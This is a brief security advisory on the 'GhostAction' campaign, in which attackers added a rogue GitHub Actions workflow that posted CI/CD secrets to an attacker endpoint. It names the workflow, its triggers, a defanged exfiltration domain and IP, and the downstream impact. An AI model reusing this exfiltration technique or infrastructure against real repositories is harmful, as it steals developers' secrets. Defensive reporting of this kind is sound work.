On September 5, 2025, GitGuardian reported a campaign titled "GhostAction": attackers with write access to GitHub repositories - gained by an unknown initial access vector - added a malicious GitHub Actions workflow that exfiltrates CI/CD secrets via HTTP POST to an attacker-controlled endpoint. The campaign has reportedly affected 327 users, 817 repositories, and 3,325 secrets (including npm, PyPI, Docker Hub, GitHub tokens, and cloud keys). The workflow - typically named "Github Actions Security" - triggered on push and workflow_dispatch and sent secrets to bold-dhawan.45-139-104-115.plesk[.]page (seen resolving to 45.139.104[.]115 during the window).
The malicious workflow can read any repository, organization, or environment secrets it references and exfiltrate them. With stolen registry tokens, attackers can publish trojaned packages/images under legitimate namespaces, poisoning downstream consumers. If static cloud credentials were present in CI, they can pivot into cloud tenants to access or modify data, tamper with workloads, escalate IAM, and persist - potentially degrading security visibility until keys are rotated. On self-hosted runners, outbound HTTP POST enables immediate egress unless restricted. The blast radius spans source and runtime estates and persists until the workflow is removed, exposed secrets are rotated, artifacts are audited, and CI shifts to short-lived OIDC access.